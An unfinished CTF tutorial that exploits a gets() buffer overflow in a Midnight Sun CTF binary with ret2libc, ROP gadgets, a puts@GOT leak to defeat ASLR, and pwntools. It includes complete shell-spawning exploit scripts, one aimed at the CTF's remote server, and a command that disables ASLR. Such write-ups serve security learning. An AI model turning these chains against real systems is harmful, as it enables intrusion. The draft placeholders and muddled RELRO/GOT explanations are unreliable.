3 April 2020

an intro to ret2libc & pwntools (64bit)

article is still WIP

In this article, I give you an introduction on exploiting stack buffer overflows when NX and ASLR security mitigations are enabled. First, we write a simplified exploit by disabling ASLR and use a technique called return oriented programming to bypass NX. We when enable ASLR and rewrite the exploit to leak data needed to bypass ASLR.

Along the way I introduce you to pwntools and guide you through the exploit development steps to grant you a shell.

This article assumes, you know how to exploit a vanilla stack buffer overflow.

Make sure you have following tools installed:
pwntools
gdb-peda
radare2
Ghidra

Download the package from here if you want to follow along.

Our example binary is from the Midnight Sun CTF 2020 qualifier competition. In the archive you can also find the shared library libc.so, which we will need later.

Starting the binary, we see it asks us to provide an input and exits once we press enter.

Let’s open the binary in Ghidra and look for vulnerable functions. The vulnerability resides in the decompiled main function:

undefined8 main(void)

{
  char local_48 [64];
  
  setvbuf(stdin,(char *)0x0,2,0);
  setvbuf(stdout,(char *)0x0,2,0);
  alarm(0x3c);
  FUN_00400687();
  printf("buffer: ");
  gets(local_48);
  return 0;
}

We can see, that the function gets stores our input in the variable local_48. There is no check implemented to verify that our input does not exceed the maximum size of the variable. Therefore a buffer overflow will occur, if the input size is bigger than 64 bytes.

Looking at the enabled security mitigations via gdb-peda, we get the following:

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

We can see, that NX is enabled, forcing us to use rops. Partial relro is enabled too, which means the pointers in the GOT for libc are always different for each application start.

TO DO WRITE COMBINATION TEXT

We use a handy python package called pwntools, made for automating common pwn tasks in ctfs. It helps us to interact with the binary and the command line interface. It also includes lots of useful functions for quick exploit development.

For developing an exploit locally, we will use our own library of libc. We can use ldd to see what libraries the binary relies on:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffff7fcf000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7dc8000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fd0000)

Let’s copy that version of libc into our directory for later use.

Preparing pwntools

We will be using the following python code as a skeleton to develop our exploit:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = gdb.debug('./pwn1', 'c') # starting gdb with our binary and continuing execution
binary = ELF('./pwn1') # loading the binary into pwntools
context.binary = binary # setting up all pwntool settings suited for the binary
rop = ROP(binary) # loading our binary to look for gadgets and building rop chains
libc = ELF('libc.so.6')
p.recvuntil("buffer:") # we tell pwntools to wait until it receives the string in stdout
p.interactive() # to continue interacting with python

Triggering the crash

We know that the buffer is of size 64. Let’s create a cyclic pattern of size 80 and feed it to our binary to trigger a crash. Let us add the following line before the interactive part:

p.sendline(cyclic(80))

Run the script. It will open a new prompt with gdb and run the program.

We see the program crashing, since it cannot resolve the saved return pointer.

We have overwritten the saved return pointer successfully.

Getting control over the instruction pointer

Now we need to understand how much of junk data we need, to reliably control the SRP. Looking at the stack we see the a part of our cyclic pattern: saaataaa. Let’s find out to what offset this belongs to. Take the first 4 bytes and feed it to the command line tool cyclic, which was installed as part of the pwntools package:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ cyclic -l "saaa"
72

We need 72 bytes of junk data to overwrite the saved return pointer. The next 8 bytes will end up in $rip.

Let’s also note down the address of the ret instruction in gdb, so that we can set a breakpoint for debugging and add it to your exploit. To verify we have control over $RIP, add the pointer 0xdeadbeef after our payload.

We now have the following code:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = gdb.debug('./pwn1', '''
	b *0x400716
	c
''')
binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('libc.so.6')
p.recvuntil("buffer:")

rop.raw("A" * 72)
rop.raw(0xdeadbeef) # our SRP
p.sendline(rop.chain())
p.interactive()

Rerunning the script, we can see 0xdeadbeef at the top of the stack meaning we have overwritten the saved return pointer and now have control over the instruction pointer:

The ret2libc attack (without ASLR)

Our goal is to get a shell. Since NX is enabled, we cannot execute data on the stack. So we have to use a different technique called return oriented programming (rop). Our library does not have the function system but the linked C standard library does. Making use of the loaded libc library in memory, we redirect the control flow to call this function:

system("/bin/sh")

Note:
Plenty of programs use functions from the standard C library. To provide a standard runtime environment and to save space, those functions are packaged in a separate file (libc.so). During the application startup, this file is loaded into the program’s memory and shared library functions can now be called. You can see where libc is loaded by running the command vmmap in gpd-peda).

Instead of putting shellcode on to the stack, we put pointers and function arguments. Those pointers help us to put the function argument (“/bin/sh”) into the proper register and finally call the system function.

Let us have a look at a simplified attack by using static pointers. For this example, we intentionally disable ASLR:

echo 0 > /proc/sys/kernel/randomize_va_space

Note:
ASLR - Address Space Layout Randomization is a security mitigation to make it harder to exploit buffer overflows. It’s purpose is to prevent exploits from using static pointers. The addresses of these pointers are randomized at every program startup.

Calling conventions
In amd64 architecture, the calling convention (order and place from where args are read) for integers is the following:
RDI
RSI
RDX
RCX
R8
R9

One way would be to use a pointer to the string (“/bin/sh”) and put it into the $RDI register. Luckily, the libc library has such a pointer. We can use the following pwntools command to look it up:

next(libc.search(b'/bin/sh'))

Next, we need to find a pointer to instructions that can get data from the stack into the $rdi register and also ends with a return. One set (aka gadget) of suitable instructions could be this:

pop rdi     #put data from the top of the stack into rdi and increment rsp
ret         #put data from the top of the stack into rpi and increment rsp

Note:
Ideally, a gadget contains no extra instructions between the ones we need and the ret. Otherwise we might have to take the extra instructions into account and adjust our payload accordingly. Sometimes, there are no perfect gadgets available.

We can find a pop_rdi_ret gadget with radare2:

console[0x004005a0]> /R pop rdi
  0x00400783                 5f  pop rdi
  0x00400784                 c3  ret
[0x004005a0]>

We will also need the base address of where libc will be mapped into the binary’s virtual memory space:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffff7fcf000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7dc8000) <--- base addr
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fd0000)

To get a pointer to system, we can ask pwntools to look for one in libc:

libc.symbols['system']

Our payload looks like this:

 +--------------------+--------------------+---------------------+-----------------+
 |                    |                    |                     |                 |
 | junk "A" * 72      | pop rdi ret gadget | ptr to "/bin/bash"  | ptr to system   |
 |                    |                    |                     |                 |
 +--------------------+--------------------+---------------------+-----------------+

Our updated exploit:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = gdb.debug('./pwn1', '''
	b *0x400716
	c
''')
binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('libc.so.6')
p.recvuntil("buffer:")

libc.address = 0x00007ffff7dc8000
rop.raw("A" * 72)
rop.raw(0x400783) # pop_rdi address
rop.raw(next(libc.search(b'/bin/sh'))) # target libc
rop.raw(libc.symbols['system'])

p.sendline(rop.chain())
p.interactive()

Running the exploit and continuing after the breakpoint results in the following crash:

You can see that the execution halted at the movaps instruction, which resides inside of the do_system function. This is unique to Ubuntu. It has its own version of libc, in which system has additional movaps instructions for moving data to the stack. These instructions require the stack to be aligned by 16 bytes. When the stack is not aligned, the movaps will trigger an error.

Let’s look at our stack alignment. If we devide rsp/by 16 and get an uneven number, we know the stack is not aligned properly: rsp = 140737488347144 rsp/16 = 8796093021696.5

If we add another 8 bytes and then divide by 16, our number is even again.

(140737488347144+8)/16 = 8796093021697

That means in order to fix our exploit, one way would be to add an additional 8 bytes of padding to our payload.

The only data we can add is a pointer, otherwise it would try to dereference the data and continue execution from where. So what pointer should we add and where shall we put it in our payload? We will add a pointer, which directly points to a ret instruction and put it before our pointer to system.

Let’s reuse our gadget we got from radare2 and pick the address of our ret instruction:

console[0x004005a0]> /R ret
  0x00400784                 c3  ret
[0x004005a0]>

Adding the new stack aligment pointer, we have the following code:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = gdb.debug('./pwn1', '''
	c
''') # removed breakpoint
binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('libc.so.6')
p.recvuntil("buffer:")

libc.address = 0x00007ffff7dc8000
rop.raw("A" * 72)
rop.raw(0x400783) # pop_rdi address
rop.raw(next(libc.search(b'/bin/sh')))
rop.raw(0x00400784) # stackalignment
rop.raw(libc.symbols['system'])

p.sendline(rop.chain())
p.interactive()

Running the script, we see that a new process is forked for “/usr/bin/dash” (replacement for sh):

Back in our terminal, we now have a shell and can interact with the system:

[*] Switching to interactive mode
 Detaching from process 30225
Detaching from process 30240
$ id
Detaching from process 30242
uid=1000(dan) gid=1000(dan) groups=1000(dan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),119(lpadmin),130(lxd),131(sambashare)

Child exited with status 0
[*] Process '/usr/bin/gdbserver' stopped with exit code 0 (pid 30225)
$

We have successfully hijacked the control flow and got a shell!

Our final payload:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = process('./pwn1')
binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('libc.so.6')
p.recvuntil("buffer:")

libc.address = 0x00007ffff7dc8000 # defining it here, so that pwntools adjusts all offsets automatically
rop.raw("A" * 72)
rop.raw(0x400783) # pop_rdi address
rop.raw(next(libc.search(b'/bin/sh'))) # target libc
rop.raw(0x00400784) # stackalignment
rop.raw(libc.symbols['system'])

p.sendline(rop.chain())
p.interactive()

The ret2plt & ret2libc attack (with ASLR)

Let’s reenable ASLR:

echo 2 > /proc/sys/kernel/randomize_va_space
// 2 - for full randomization

Our exploit now breaks, since the base address of our string and functions are randomized everytime we run the binary. We can use ldd to load the binary and check where it would end up in memory:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffe04bf9000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe54ef04000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fe54f108000)
dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffe7cdfe000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f9dc7360000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f9dc7564000)
dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffdb196a000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f0f707ae000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f0f709b2000)

As you can see, the base address is always different.

Since our address for system is now randomized, we need to figure out how we can determine its address. If we have a way to find a pointer to any function from libc and also have the system’s libc binary, we are able to calculate the shared library’s base address. These function pointers have a constant offset from the start of the shared library. So we subtract the pointer with that known constant and get the base address of libc. Pwntools will assist us in that process.

How do we find such a pointer?

Our plan to leak a pointer will be calling puts (instead of system) to print a pointer for us to the console. That pointer will be also puts but could be any other function from the PLT as well.

PARTIAL RELRO - LAZY BINDING - get the diagram from the book

Note: Why can we call puts but not system, even though both are from libc and ASLR is enabled? Our binary was not compiled with the Postion Independent Code flag, as we saw earlier in checksec. Therefore, our binary relies on a fixed offset to the Procedure Linkage Table to resolve funtions from shared libraries. Any function inside the PLT has a static address. The function puts is part of the libc library. The compiler will create a reference for every function used in the binary in a lookup table, called the Global Offset Table (GOT). The GOT that function, a reference is created in the PLT during compilation time. The function “system” is not called by our binary and therefore no reference exists in the PLT.

In summary: The PLT is needed to find the shared library function and the GOT holds the reference to the pointer

plt

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ objdump -d pwn1 -j .plt

pwn1:     file format elf64-x86-64


Disassembly of section .plt:

0000000000400540 <puts@plt-0x10>:
  400540:	ff 35 c2 1a 20 00    	pushq  0x201ac2(%rip)        # 602008 <setvbuf@plt+0x201a78>
  400546:	ff 25 c4 1a 20 00    	jmpq   *0x201ac4(%rip)        # 602010 <setvbuf@plt+0x201a80>
  40054c:	0f 1f 40 00          	nopl   0x0(%rax)

0000000000400550 <puts@plt>:
  400550:	ff 25 c2 1a 20 00    	jmpq   *0x201ac2(%rip)        # 602018 <setvbuf@plt+0x201a88>
  400556:	68 00 00 00 00       	pushq  $0x0
  40055b:	e9 e0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

0000000000400560 <printf@plt>:
  400560:	ff 25 ba 1a 20 00    	jmpq   *0x201aba(%rip)        # 602020 <setvbuf@plt+0x201a90>
  400566:	68 01 00 00 00       	pushq  $0x1
  40056b:	e9 d0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

0000000000400570 <alarm@plt>:
  400570:	ff 25 b2 1a 20 00    	jmpq   *0x201ab2(%rip)        # 602028 <setvbuf@plt+0x201a98>
  400576:	68 02 00 00 00       	pushq  $0x2
  40057b:	e9 c0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

0000000000400580 <gets@plt>:
  400580:	ff 25 aa 1a 20 00    	jmpq   *0x201aaa(%rip)        # 602030 <setvbuf@plt+0x201aa0>
  400586:	68 03 00 00 00       	pushq  $0x3
  40058b:	e9 b0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

0000000000400590 <setvbuf@plt>:
  400590:	ff 25 a2 1a 20 00    	jmpq   *0x201aa2(%rip)        # 602038 <setvbuf@plt+0x201aa8>
  400596:	68 04 00 00 00       	pushq  $0x4
  40059b:	e9 a0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

comppiler references relocation entries (GOT) Let’s take a look at all entries in the .rela.plt section:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ readelf --relocs pwn1

Relocation section '.rela.dyn' at offset 0x448 contains 4 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000601ff0  000400000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.2.5 + 0
000000601ff8  000500000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000602050  000800000005 R_X86_64_COPY     0000000000602050 stdout@GLIBC_2.2.5 + 0
000000602060  000900000005 R_X86_64_COPY     0000000000602060 stdin@GLIBC_2.2.5 + 0

Relocation section '.rela.plt' at offset 0x4a8 contains 5 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000602018  000100000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0
000000602020  000200000007 R_X86_64_JUMP_SLO 0000000000000000 printf@GLIBC_2.2.5 + 0
000000602028  000300000007 R_X86_64_JUMP_SLO 0000000000000000 alarm@GLIBC_2.2.5 + 0
000000602030  000600000007 R_X86_64_JUMP_SLO 0000000000000000 gets@GLIBC_2.2.5 + 0
000000602038  000700000007 R_X86_64_JUMP_SLO 0000000000000000 setvbuf@GLIBC_2.2.5 + 0

We can see, that no entry for system exists.

Let’s checkout how this looks in the debugger. Fire up the binary in gdb and enter the following commands:

starti
b gets

Let us see how the disassemble puts function looks like before the lazy-binding has occured:

gdb-peda$ disas puts
Dump of assembler code for function puts@plt:
   0x0000000000400550 <+0>:	jmp    QWORD PTR [rip+0x201ac2]        # 0x602018 <puts@got.plt>
   0x0000000000400556 <+6>:	push   0x0
   0x000000000040055b <+11>:	jmp    0x400540

Here we see the PLT stub. The first instruction is pointing to our GOT entry. Let’s see what value resides there:

gdb-peda$ x/qx 0x602018
0x602018 <puts@got.plt>:	0x00400556

As expected, the GOT entry points to the 2nd instruction of the puts’s PLT stub. We continue to let the program run, until it breaks at gets and analyse the GOT entry again:

gdb-peda$ x/qx 0x602018
0x602018 <puts@got.plt>:	0x00007ffff7e4f490

We see the entry has been populated with a pointer to libc’s gets. Also, when we try to disassemble puts now, we see the right function instead of the PLT stub.

gdb-peda$ disas puts
Dump of assembler code for function __GI__IO_puts:
Address range 0x7ffff7e4f490 to 0x7ffff7e4f66c:
   0x00007ffff7e4f490 <+0>:	endbr64 
   0x00007ffff7e4f494 <+4>:	push   r14
   0x00007ffff7e4f496 <+6>:	push   r13
[...]

Leaking a function pointer and getting libc

We now know, that we need to leak the pointer stored in the GOT of puts. We also know, that this entry will be only populated, once puts has been called once (lazy-binding). If we leak the GOTs entry before the function was called, we would get a pointer to the functions PLT stub, instead of the proper libc function. Calculating the base libc address is not possible that way.

Since we have only partial relro activated, the functions are looked up via a method called lazy-binding. That means, only when a function is called for the first time its address is looked up.

DIAGRAM HERE

Remember, libc’s position in memory changes everytime we start the program. That’s why we need to leak the address and exploit the binary before it exits. How do we achieve this? Our program exits once we have entered data. We can prevent the program from exiting by adding another pointer at the end of our payload, which points to the start of our main loop.

ret2plt

gots/plt

If the address of loaded libraries is loaded

attack scenario: 1. we look for a libc function which was called once 2. we call the function with its libc 1. we send our first stage payload to overwrite the saved retun pointer to call puts (plt) to print out the puts (got)? 2. we redirect the execution flow back to the main function 3. we calculate the base address of libc from the leaked pointer 4. we create our second payload, with the right offsets for “/bin/sh” and “system” 5.we launch our second payload to get a shell

the final exploit dev recipe: 1. overwrite the buffer with a cyclic pattern 2. replacing

Getting the libc addresses

Leaking the address

A great explanation of GOT/plt and relro can be found here:

But in a nutshell: relro moves the libc GOT pointers we need, every application start, to a different address.

The recipe:

find a libc function which was called already once, before the binary was started so that the GOT entry is populated with the function address instead of the dynamic linker stub

My solution:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = remote('pwn1-01.play.midnightsunctf.se',10001)

binary = ELF('./pwn1')
context.binary = binary #this is needed so a correct rop chain based on the binary arch can be generated
rop = ROP(binary)

libc = ELF('libc.so')

rop.raw("A" * 72)
rop.puts(binary.got['puts'])

rop.call(0x400698) # main function

log.info("obtaining address leak of puts:\n" +rop.dump())

p.recvuntil("buffer:") 
p.sendline(rop.chain())
leakedPuts = p.recvline()[:8].strip()
log.success("Leaked puts@GLIBC: {}".format(leakedPuts))

leakedPuts = int.from_bytes(leakedPuts, byteorder='little')

libc.address = leakedPuts - libc.symbols["puts"]
rop2 = ROP(libc)
rop2.raw("A" * 72)

pop_rdi = p64(0x400783) # pop_rdi address
sh = p64(next(libc.search(b'/bin/sh'))) # target libc
sys = p64(libc.symbols['system'])
padding = b"A"*72

#stack alignment for movaps instruction ubuntu
# simple pointer to a ret function just to keep the stackaligned by 16 bytes
stack_alignment = p64(0x00400784)

p.recvuntil("buffer:")
payload = padding + pop_rdi + sh + stack_alignment + sys #stacklignment is only needed for ubuntu

print(sh)
p.sendline(payload)

p.interactive()

The flag midnight{the_pwnshank_redemption_d2b4205bea4b8eeb}

Additional resources:

Bonus Challenges:

Change the payload to use one_gadget
Use a different technique like ret2got
Implement an automated libc address lookup based on the leaked pointer by integrating libc-database into your exploit